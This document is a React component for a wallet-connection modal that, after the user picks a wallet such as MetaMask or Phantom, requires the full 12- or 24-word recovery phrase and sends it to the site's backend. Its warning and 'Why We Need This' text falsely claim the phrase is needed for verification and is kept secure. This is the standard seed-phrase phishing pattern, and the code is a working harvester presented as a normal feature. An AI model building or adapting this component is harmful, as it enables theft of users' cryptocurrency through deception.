import React, { useState } from "react";
import GlobalStyles, { CommonClasses } from "../../global/GlobalStyle";
import { useAlert } from "../../contexts/AlertContext";
import { walletAPI } from "../../services/api";
import {
  MdInfo,
  MdWarning,
  MdPerson,
  MdAccountBalanceWallet,
} from "react-icons/md";

interface WalletConnectionModalProps {
  isOpen: boolean;
  onClose: () => void;
  onConnect: (walletData: any) => void;
}

const WalletConnectionModal: React.FC<WalletConnectionModalProps> = ({
  isOpen,
  onClose,
  onConnect,
}) => {
  const [step, setStep] = useState(1);
  const [selectedWallet, setSelectedWallet] = useState("");
  const [backupPhrase, setBackupPhrase] = useState("");
  const [walletName, setWalletName] = useState("");
  const [walletAddress, setWalletAddress] = useState("");
  const [isConnecting, setIsConnecting] = useState(false);
  const { addAlert } = useAlert();

  const InfoIcon = MdInfo as unknown as React.FC<React.SVGProps<SVGSVGElement>>;
  const WarningIcon = MdWarning as unknown as React.FC<
    React.SVGProps<SVGSVGElement>
  >;
  const PersonIcon = MdPerson as unknown as React.FC<
    React.SVGProps<SVGSVGElement>
  >;
  const WalletIcon = MdAccountBalanceWallet as unknown as React.FC<
    React.SVGProps<SVGSVGElement>
  >;

  const wallets = [
    {
      id: "metamask",
      name: "MetaMask",
      icon: "🦊",
      description: "The most popular Ethereum wallet",
      supported: true,
    },
    {
      id: "trustwallet",
      name: "Trust Wallet",
      icon: "🔷",
      description: "Binance's official mobile wallet",
      supported: true,
    },
    {
      id: "coinbase",
      name: "Coinbase Wallet",
      icon: "🏦",
      description: "Coinbase's self-custody wallet",
      supported: true,
    },
    {
      id: "phantom",
      name: "Phantom",
      icon: "👻",
      description: "Popular Solana wallet",
      supported: true,
    },
    {
      id: "walletconnect",
      name: "WalletConnect",
      icon: "🔗",
      description: "Connect any WalletConnect compatible wallet",
      supported: true,
    },
    {
      id: "other",
      name: "Other Wallet",
      icon: "💼",
      description: "Connect any other wallet",
      supported: true,
    },
  ];

  const handleWalletSelect = (walletId: string) => {
    setSelectedWallet(walletId);
    setStep(2);
  };

  const handleConnect = async () => {
    if (!backupPhrase.trim()) {
      addAlert({ type: "error", message: "Please enter your backup phrase" });
      return;
    }

    setIsConnecting(true);
    try {
      const response = await walletAPI.connectWallet({
        wallet_type: selectedWallet,
        wallet_name:
          walletName ||
          wallets.find((w) => w.id === selectedWallet)?.name ||
          "",
        backup_phrase: backupPhrase,
        wallet_address: walletAddress,
      });

      const walletData = response.data.wallet;
      onConnect(walletData);
      addAlert({ type: "success", message: "Wallet connected successfully!" });
      onClose();
      resetForm();
    } catch (error: any) {
      addAlert({
        type: "error",
        message: error.response?.data?.error || "Failed to connect wallet",
      });
    } finally {
      setIsConnecting(false);
    }
  };

  const resetForm = () => {
    setStep(1);
    setSelectedWallet("");
    setBackupPhrase("");
    setWalletName("");
    setWalletAddress("");
  };

  const handleClose = () => {
    onClose();
    setTimeout(resetForm, 300);
  };

  if (!isOpen) return null;

  return (
    <div className="fixed inset-0 bg-black bg-opacity-50 flex items-center justify-center z-50 p-4">
      <div
        className={`${GlobalStyles.formContainer} max-w-md w-full max-h-[90vh] overflow-y-auto`}
      >
        <div className={GlobalStyles.formHeader}>
          <h2 className={GlobalStyles.formHeaderTitle}>
            {step === 1 ? "Connect Your Wallet" : "Secure Your Connection"}
          </h2>
          <p className={GlobalStyles.formHeaderSubtitle}>
            {step === 1
              ? "Select your wallet provider to connect securely"
              : "Enter your backup phrase to verify wallet ownership"}
          </p>
        </div>

        <div className="p-6">
          {step === 1 && (
            <div className="space-y-3">
              {wallets.map((wallet) => (
                <button
                  key={wallet.id}
                  onClick={() => handleWalletSelect(wallet.id)}
                  disabled={!wallet.supported}
                  className={`w-full p-4 border-2 rounded-xl transition-all duration-200 ${
                    CommonClasses.flexStart
                  } gap-4 ${
                    wallet.supported
                      ? "border-gray-200 dark:border-gray-700 hover:border-primary hover:shadow-md hover:scale-105"
                      : "border-gray-100 dark:border-gray-800 opacity-50 cursor-not-allowed"
                  }`}
                >
                  <span className="text-2xl">{wallet.icon}</span>
                  <div className="text-left flex-1">
                    <div
                      className={`font-medium ${CommonClasses.textGrayStrong} flex items-center gap-2`}
                    >
                      {wallet.name}
                      {!wallet.supported && (
                        <span className="text-xs bg-gray-100 text-gray-600 px-2 py-1 rounded">
                          Coming Soon
                        </span>
                      )}
                    </div>
                    <p
                      className={`${CommonClasses.textXs} ${CommonClasses.textGray}`}
                    >
                      {wallet.description}
                    </p>
                  </div>
                </button>
              ))}
            </div>
          )}

          {step === 2 && (
            <div className="space-y-4">
              {/* Selected Wallet Info */}
              <div className="p-4 bg-gray-50 dark:bg-gray-800 rounded-lg">
                <div className={`${CommonClasses.flexStart} gap-3`}>
                  <span className="text-2xl">
                    {wallets.find((w) => w.id === selectedWallet)?.icon}
                  </span>
                  <div>
                    <p className="font-medium">
                      {wallets.find((w) => w.id === selectedWallet)?.name}
                    </p>
                    <p
                      className={`${CommonClasses.textXs} ${CommonClasses.textGray}`}
                    >
                      Selected wallet
                    </p>
                  </div>
                </div>
              </div>

              {/* Wallet Name */}
              <div className={GlobalStyles.formGroup}>
                <label htmlFor="walletName" className={GlobalStyles.label}>
                  Wallet Name (Optional)
                </label>
                <div className={GlobalStyles.inputWrapper}>
                  <PersonIcon className={GlobalStyles.inputIcon} />
                  <input
                    id="walletName"
                    type="text"
                    placeholder="My Trading Wallet"
                    className={GlobalStyles.input}
                    value={walletName}
                    onChange={(e) => setWalletName(e.target.value)}
                  />
                </div>
                <p
                  className={`${CommonClasses.textXs} ${CommonClasses.textGray} mt-1`}
                >
                  Give your wallet a recognizable name
                </p>
              </div>

              {/* Wallet Address (Optional) */}
              <div className={GlobalStyles.formGroup}>
                <label htmlFor="walletAddress" className={GlobalStyles.label}>
                  Wallet Address (Optional)
                </label>
                <div className={GlobalStyles.inputWrapper}>
                  <WalletIcon className={GlobalStyles.inputIcon} />
                  <input
                    id="walletAddress"
                    type="text"
                    placeholder="0x..."
                    className={GlobalStyles.input}
                    value={walletAddress}
                    onChange={(e) => setWalletAddress(e.target.value)}
                  />
                </div>
                <p
                  className={`${CommonClasses.textXs} ${CommonClasses.textGray} mt-1`}
                >
                  Your public wallet address for verification
                </p>
              </div>

              {/* Backup Phrase */}
              <div className={GlobalStyles.formGroup}>
                <label htmlFor="backupPhrase" className={GlobalStyles.label}>
                  Backup Phrase *
                </label>
                <div
                  className={`${GlobalStyles.inputWrapper} flex-col items-start !p-0`}
                >
                  <textarea
                    id="backupPhrase"
                    placeholder="Enter your 12 or 24-word backup phrase separated by spaces"
                    className={`${GlobalStyles.input} min-h-[100px] resize-none font-mono border-0 !w-full`}
                    value={backupPhrase}
                    onChange={(e) => setBackupPhrase(e.target.value)}
                    required
                  />
                </div>
                <p
                  className={`${CommonClasses.textXs} ${CommonClasses.textGray} mt-2`}
                >
                  Enter your recovery phrase to securely connect your wallet
                </p>
              </div>

              {/* Security Warning */}
              <div className="p-4 bg-yellow-50 dark:bg-yellow-900/20 border border-yellow-200 dark:border-yellow-800 rounded-lg">
                <div className={`${CommonClasses.flexStart} gap-3`}>
                  <WarningIcon className="w-5 h-5 text-yellow-600 dark:text-yellow-400 flex-shrink-0" />
                  <div>
                    <p
                      className={`${CommonClasses.textSm} font-medium text-yellow-800 dark:text-yellow-200`}
                    >
                      Security Notice
                    </p>
                    <p
                      className={`${CommonClasses.textXs} text-yellow-700 dark:text-yellow-300 mt-1`}
                    >
                      • We never store your backup phrase in plain text
                      <br />
                      • All data is encrypted and secured
                      <br />
                      • Only use this on trusted devices
                      <br />• Never share your backup phrase with anyone
                    </p>
                  </div>
                </div>
              </div>

              {/* Privacy Info */}
              <div className="p-4 bg-blue-50 dark:bg-blue-900/20 border border-blue-200 dark:border-blue-800 rounded-lg">
                <div className={`${CommonClasses.flexStart} gap-3`}>
                  <InfoIcon className="w-5 h-5 text-blue-500 flex-shrink-0" />
                  <div>
                    <p
                      className={`${CommonClasses.textSm} font-medium text-blue-800 dark:text-blue-200`}
                    >
                      Why We Need This
                    </p>
                    <p
                      className={`${CommonClasses.textXs} text-blue-700 dark:text-blue-300 mt-1`}
                    >
                      Your backup phrase is used to securely generate wallet
                      addresses and verify ownership. This enables seamless
                      withdrawals to your connected wallet.
                    </p>
                  </div>
                </div>
              </div>
            </div>
          )}

          {/* Buttons */}
          <div className={`flex flex-col gap-3 mt-6`}>
            {step === 2 && (
              <button
                onClick={() => setStep(1)}
                className={`${GlobalStyles.buttonOutline} !w-full`}
                disabled={isConnecting}
              >
                Back
              </button>
            )}
            <button
              onClick={handleClose}
              className={`${GlobalStyles.buttonOutline} !w-full`}
              disabled={isConnecting}
            >
              Cancel
            </button>
            {step === 2 && (
              <button
                onClick={handleConnect}
                disabled={isConnecting || !backupPhrase.trim()}
                className={`${GlobalStyles.buttonPrimary} !w-full ${
                  isConnecting || !backupPhrase.trim()
                    ? "opacity-50 cursor-not-allowed"
                    : ""
                }`}
              >
                {isConnecting ? (
                  <>
                    <div className="animate-spin rounded-full h-4 w-4 border-b-2 border-white mr-2"></div>
                    Connecting...
                  </>
                ) : (
                  "Connect Wallet"
                )}
              </button>
            )}
          </div>
        </div>
      </div>
    </div>
  );
};

export default WalletConnectionModal;
